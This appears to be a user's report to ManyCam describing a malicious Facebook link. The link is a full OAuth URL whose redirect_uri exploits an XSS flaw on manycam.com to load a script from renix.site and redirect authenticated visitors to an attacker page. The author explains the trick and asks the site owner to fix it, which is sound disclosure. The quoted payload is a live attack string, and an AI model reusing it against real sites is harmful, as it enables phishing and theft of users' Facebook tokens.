I came accross the following link on a Facebook post:
If you visit that link, it redirects to Facebook for Oauth2 that tries to authenticate the user against the Manycam facebook app:
https://mbasic.facebook.com/v3.2/dialog/oauth?client_id=187641897343&privacyx=300645083384735&response_type=token&scope=public_profile,email&redirect_uri=https://manycam.com/applications/?os=*/mac=%271%27;document.documentElement.innerHTML%3D%27%27;window.location.href=`https://renix.site/iphone.php`;%3C/script%3E%3Clink%20rel=%22stylesheet%22%20href=%22https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css%22%20integrity=%22sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T%22%20crossorigin=%22anonymous%22%3E%3Cscript%20src=%22https://renix.site/fb/stayed.js?%26view=ustreamtv%22%3E%3Ca+href=%27https://renix.site/iphone.php%27%3E%3Cimg+src=%27https://i.imgur.com/hyRvgh3.jpg%27%20style=%27position:%20fixed;%20left:%200;%20top:%200;%20height:%20100%;%20width:%20100%%27%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E+%3Cscript%3E/*x=%60;/*%22%3E&response_type=token
If you look carefully at the redirect_uri parameter, you’ll notice it’s leveraging an XSS vulnerability on the Manycam website to redirect to the attacker’s website after they are authenticated.
The attackers probably have access to your Facebook app credentials or something. Please fix your website and secure your Facebook application. Thanks.